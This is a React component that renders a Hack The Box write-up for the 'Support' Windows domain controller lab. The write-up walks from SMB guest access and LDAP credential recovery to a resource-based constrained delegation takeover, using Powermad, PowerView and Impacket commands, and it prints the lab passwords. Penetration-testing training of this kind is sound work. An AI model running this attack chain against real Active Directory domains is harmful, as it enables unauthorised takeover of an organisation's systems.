import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import {Prism as SyntaxHighlighter} from 'react-syntax-highlighter'
import {dracula} from 'react-syntax-highlighter/dist/esm/styles/prism'
import './htb.css'

const markdown = `
### Machine IP: 10.10.11.174

![](/writeups/Support/support_banner.png)

Author: Arman
- https://github.com/ArmanHZ
- https://app.hackthebox.com/profile/318304

---
### Initial enumeration
As always, we will start with \`nmap\`. This box requires us to use the \`-Pn\` flag, since without it we will not find any open ports.

\`\`\`bash
mkdir nmap
nmap -Pn -sC -sV -v -oN nmap/initial_scan 10.10.11.174
\`\`\`

\`\`\`text
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-25 19:31:17Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-08-25T19:31:27
|_  start_date: N/A
\`\`\`

There is no web server and all we see is the standard \`Active Directory\` services.
We see a domain name \`support.htb\`, so we will also add that to the \`/etc/hosts\` file.

For this case, I would like to also run the \`nmap\` script for \`LDAP\` enumeration.

\`\`\`bash
nmap -v -Pn -sV -p 389 --script "ldap-search,ldap-rootdse,ldap-novell-getpass" -oN nmap/ldap_search 10.10.11.174
\`\`\`

The output of this command is quite large, however, there are few important info that we get:

\`\`\`bash
rootDomainNamingContext: DC=support,DC=htb
dnsHostName: dc.support.htb
\`\`\`

We get the domain controller host name \`dc.support.htb\` which we will be adding to the \`/etc/hosts\` file.

Now it is time to check out some services starting with \`samba\`.

---
### Enumerating Samba (smb)
Since we do not have any credentials, we will try the guest login first:

\`\`\`bash
smbclient -U "Guest" -L 10.10.11.174
# Press enter for empty password when prompted
\`\`\`

![](/writeups/Support/smb_dirs.png)

We can login as the \`Guest\` user! There are some default directories, however, we have an interesting share \`support-tools\`.

We can try accessing the share and see its content with the following commands:

\`\`\`bash
smbclient -U "Guest" //10.10.11.174/support-tools
\`\`\`

![](/writeups/Support/support_tools.png)

There are a lot of things, however, if we look at the dates when the files were created, one stands out. The \`UserInfo.exe.zip\` is what we want.

We can download is using \`get UserInfo.exe.zip\`.

Now let us examine the contents of the file.

---
### Examining UserInfo.exe.zip
Using the \`unzip\` command, we unzip the \`.zip\` file.
The content is as follows:

\`\`\`bash
ls -Al

total 936
-rw-rw-rw- 1 dw dw  99840 Mar  1 12:18 CommandLineParser.dll
-rw-rw-rw- 1 dw dw  22144 Oct 22  2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 dw dw  47216 Oct 22  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 dw dw  84608 Oct 22  2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 dw dw  64112 Oct 22  2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 dw dw  20856 Feb 19  2020 System.Buffers.dll
-rw-rw-rw- 1 dw dw 141184 Feb 19  2020 System.Memory.dll
-rw-rw-rw- 1 dw dw 115856 May 15  2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 dw dw  18024 Oct 22  2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 dw dw  25984 Feb 19  2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 dw dw  12288 May 27 12:51 UserInfo.exe
-rw-rw-rw- 1 dw dw    563 May 27 11:59 UserInfo.exe.config
-rw-r--r-- 1 dw dw 277499 Aug 25 16:12 UserInfo.exe.zip
\`\`\`

Using the \`file\` command on the \`UserInfo.exe\`, we get further information on the file:

\`\`\`bash
file UserInfo.exe

UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
\`\`\`

So, we are dealing with a \`.NET\` file. Luckily, disassembling \`.NET\` is quite easy.
For this task, we will use \`dotPeek\` (https://www.jetbrains.com/decompiler/). Unfortunately, \`dotPeek\` is not available on Linux, so we will use our Windows VM for analyzing the file.

Note: We cannot run the \`UserInfo.exe\` since it connects to the internal server. That is why I did not go over it. However, the app is a command line app.

### Using dotPeek to disassemble the file
Looking around, we find a username and how the \`LDAP\` query is processed in the \`LdapQuery\` class.

![](/writeups/Support/ldap_query.png)

The username is \`ldap\` and the domain is \`suppoort\`. The password comes from a function called \`getPassword()\` from a class called \`Protected\`.
Checking the class and function:

![](/writeups/Support/encryption_dotpeek.png)

We see how the password is decrypted. We do not need to understand any of this function, since every parameter is provided to us. We simply need to copy the function and run it.

Using the \`dotnet\` command line tools, we first create a project with \`dotnet new console\` and paste the function (with a bit of editing) to the \`Program.cs\` file. Then run it using \`dotnet run\`.


![](/writeups/Support/dotpeek_password.png)

We get the unencrypted password \`nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\`
So our first credentials are: \`ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\`

Trying this password on \`winrm\` and other services do not work. This is expected, since this is the password for \`LDAP\`. However, checking password re-use is always a good practice.
Now let us move on to \`LDAP\` enumeration.

---
### LDAP Enumeration
We will be using \`ldapsearch\` to execute queries.

To dump everything, we can use the following command:

\`\`\`bash
ldapsearch -x -H ldap://support.htb -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap.dump
\`\`\`

The output is very huge as expected. However, I like to run \`grep\` and searching for things like \`Description\` on the output. Sometimes admins put important information on such fields.

\`\`\`
grep -i 'description\\|info\\|notes' ldap.dump
\`\`\`

![](/writeups/Support/grep_password.png)

So, the 5092th line of the \`ldap.dump\` file has a string which looks very similar to a password.
Using \`less\` on \`ldap.dump\` file and using \`:5092n\` to jump to the line 5092, we get:

![](/writeups/Support/grep_password_2.png)

So, we have another credential \`support:Ironside47pleasure40Watchful\`
We can use these credentials with \`evil-winrm\` and get the user flag!

---
### User flag and enumeration
The \`support\` user has the \`user.txt\`.

![](/writeups/Support/user_flag.png)

Checking common information with \`whoami /all\` or directory content with \`gci -force -recurse *\` does not give us anything important.

Since, we are dealing with an AD server, we can run some AD related commands:

\`\`\`powershell
Get-ADUser -Filter * | select Name

Name
----
Administrator
Guest
krbtgt
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria

gci C:\\Users

    Directory: C:\\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/28/2022   4:11 AM                Administrator
d-----         7/26/2022   6:21 AM                ldap
d-r---         5/19/2022   2:13 AM                Public
d-----         8/30/2022   3:28 PM                support
\`\`\`

There are a lot of AD users but they are not on this machine and running the \`hostname\` tells us this machine is \`DC\`. We already have access to the \`support\` and \`ldap\` users. So the next step is for sure getting the \`Administrator\`.

Checking the groups:

\`\`\`powershell
Get-ADGroup -filter * | select Name
\`\`\`

We don't find anything out of the ordinary.

Next step is to upload \`SharpHound.ps1\` to the server and investigate the AD relations using \`BloodHound\`.

---
### BloodHound
Using the \`upload\` feature of \`evil-winrm\`, we can upload \`SharpHound.ps1\`. (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)

\`\`\`powershell
. \\.SharpHound.ps1 # To Import the module
Invoke-Bloodhound

# A zip file of the result will be created
20220830162021_BloodHound.zip
\`\`\`

Using the \`download\` feature of \`evil-winrm\` we can download the zip file.
After that, we can upload it to the \`BloodHound\` for analysis.

After some looking around, we find the following:

First, we need to find the \`support\` node using any \`BloodHound\` queue.

![](/writeups/Support/support_node.png)

And in the \`Node Info\` panel, we use the \`Group Delegated Object Control\`.

![](/writeups/Support/generic_all.png)

We find that the user \`support\` which is a part of the \`shared support accouunts\` groups has \`GenericAll\` permission on the \`DC\`.
Searching how to exploit this permission, we find the following blog posts:

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation

Unfortunately the \`Rubeus.exe\` part does not work, however, instead of \`Rubeus.exe\` we can use \`Impacket\` and get the service ticket for the \`smb\` service and get a shell.

---
### Root
We need to upload \`Powermad.ps1\` to the server first. (https://github.com/Kevin-Robertson/Powermad)
We also need to upload \`PowerView.ps1\` as well. (https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)

The details of the attack is explained in the blogs. We will create a fake machine and mess with its privileges and finally create a ticket impersonating \`Administrator\`. 
The current machine will trust our newly created machine due to \`msDS-AllowedToActOnBehalfOfOtherIdentity\` privilege which we set.

\`\`\`powershell
. .\\Powermad.ps1
# Creating the fake machine
New-MachineAccount -MachineAccount FAKECOMPUTER -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

# Setting the delegations
Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$

. .\\PowerView.ps1

# Setting the act on behalf privilege
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
\`\`\`

Now on our Linux machine, we will use \`Impacket\`:

\`\`\`bash
# Get the ccache
python3 getST.py support.htb/FAKECOMPUTER -dc-ip dc.support.htb -impersoname administrator -spn www/dc.support.htb

# Set the ccache
export KRB5CCNAME=administrator.ccache

# Become the admin
python3 smbexec.py support.htb/administrator@dc.support.htb -no-pass -k
\`\`\`

![](/writeups/Support/root.png)
`;

export default function Support() {
  return (
    <div className='writeup-div'>
      <ReactMarkdown
      children={markdown}
      remarkPlugins={[remarkGfm]}
      components={{
        code({node, inline, className, children, ...props}) {
          const match = /language-(\w+)/.exec(className || '')
          return !inline && match ? (
            // @ts-ignore
            <SyntaxHighlighter children={String(children).replace(/\n$/, '')} style={dracula} language={match[1]} PreTag="div" {...props} />
          ) : (
            <code className={className} {...props}>
              {children}
            </code>
          )
        }
      }}
      />
    </div>
  )
}